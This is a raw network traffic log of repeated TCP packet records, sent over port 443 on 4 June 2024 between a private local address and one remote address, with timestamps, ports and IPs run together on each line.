                                      Jun 4, 2024 14:14:46.303370953 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.311007977 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.311201096 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.311223030 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.311494112 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.319638014 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.319932938 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.319994926 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.320336103 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.327869892 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.328098059 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.328155994 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.328363895 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.336162090 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.336353064 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.336410999 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.336673021 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.336726904 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.336982965 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.344340086 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.344578028 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.344634056 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.344834089 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.351855040 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.352104902 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.352158070 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.352364063 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.359457970 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.359649897 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.359708071 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.359915972 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.366852045 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.367089987 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.367147923 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.367342949 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.374430895 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.374638081 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.378237963 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.378487110 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.378544092 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.378740072 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.385561943 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.385766029 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.385792971 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.385991096 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.408453941 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.408735037 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.408761024 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.408988953 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.411830902 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.412094116 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.412120104 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.412337065 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.418734074 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.419007063 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.419033051 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.419248104 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.424840927 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.425117016 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.425143957 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.425337076 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.430891991 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.431168079 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.431196928 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.431428909 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.436553001 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.436652899 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.436880112 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.436909914 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.436927080 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.437088966 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.442342043 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.442745924 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.442771912 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.443011999 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.448046923 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.448440075 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.448467016 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.448662996 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.453666925 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.453927040 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.453953028 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.454199076 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.459434986 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.459687948 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.459716082 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.459933996 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.465138912 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.465395927 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.467876911 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.468072891 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.468101025 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.468326092 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.473718882 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.473974943 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.474003077 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.474196911 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.479346037 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.479563951 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.479589939 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.479873896 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.485070944 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.485413074 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.485440969 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.485620022 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.490683079 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.490942955 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.490969896 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.491163015 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.496113062 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.496320963 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.496346951 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.496531963 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.501193047 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.501517057 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.501543045 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.501737118 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.506302118 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.506550074 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.506577969 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.506755114 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.511322021 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.511450052 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.511471987 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.511674881 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.516302109 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.516556025 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.516575098 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.517041922 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.521156073 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.521339893 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.521356106 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.521677971 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.525957108 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.526139975 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.526155949 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.526359081 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.530873060 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.531104088 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.533304930 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.533488035 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.533503056 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.533752918 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.538049936 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.538305044 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.538321018 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.538520098 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.542948961 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.543314934 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.543329000 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.543562889 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.545949936 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.546176910 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.546192884 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.546417952 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.548962116 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.549160957 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.549175978 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.549408913 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.551981926 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.552340031 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.552355051 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.552582979 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.555104017 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.555296898 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.555313110 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.555531979 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.558094978 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.558397055 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.558412075 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.558566093 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.561048031 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.561275959 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.561291933 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.561453104 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.563975096 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.564330101 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.564343929 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.564656019 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.566870928 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.567053080 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.567066908 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.567245007 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.569787979 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.570019007 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.570033073 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.570195913 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.572585106 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.572776079 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.573986053 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.574239969 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.574254990 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.574470997 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.576770067 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.576946974 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.576961040 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.577162027 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.579648972 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.579879999 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.579895020 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.580126047 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.582288980 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.582442999 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.582459927 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.582727909 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.585136890 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.585350037 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.585366011 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.585532904 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.587857962 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.588063002 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.588078022 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.588259935 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.590562105 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.590817928 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.590832949 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.591048002 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.593204021 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.593489885 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.593506098 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.593693018 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.595798969 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.596118927 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.596133947 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.596484900 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.598352909 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.598640919 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.598655939 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.598850965 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.600987911 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.601285934 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.601300955 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.601597071 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.603502035 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.603765965 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.603780985 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.603959084 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.605977058 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.606204987 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.607230902 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.607527018 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.607542038 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.607770920 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.609723091 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.610027075 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.610043049 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.610223055 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.612149954 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.612341881 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.612356901 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.612564087 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.614625931 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.614903927 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.614918947 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.615255117 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.617057085 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.617295980 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.617311001 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.617552042 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.619488001 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.619621038 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.619636059 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.619844913 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.621881008 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.622061014 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.622076035 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.622281075 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.624248028 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.624434948 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.624448061 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.624711990 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.626626015 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.626846075 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.626862049 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.627104044 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.628942966 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.629221916 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.629237890 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.629451036 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.631247997 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.631428957 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.631444931 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.631627083 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.633447886 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.633656025 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.633671045 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.633879900 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.635641098 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.635909081 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.636805058 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.637025118 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.637039900 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.637285948 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.639048100 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.639319897 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.639332056 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.639497995 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.641288996 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.641539097 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.641550064 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.641802073 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.643395901 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.643542051 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.643552065 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.643785000 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.645574093 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.645847082 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.645858049 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.646029949 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.647764921 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.647989035 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.647999048 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.648266077 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.649930000 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.650091887 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.650103092 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.650377989 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.652015924 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.652259111 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.652270079 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.652448893 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.654186964 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.654423952 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.654434919 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.654710054 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.656347990 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.656615019 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.656625986 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.656861067 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.658447981 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.658596039 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.658606052 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.658828974 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.660674095 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.660917997 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.660929918 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.661194086 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.662683010 CEST44349843172.217.215.132192.168.11.30
                                      Jun 4, 2024 14:14:46.662942886 CEST49843443192.168.11.30172.217.215.132
                                      Jun 4, 2024 14:14:46.663796902 CEST44349843172.217.215.132192.168.11.30
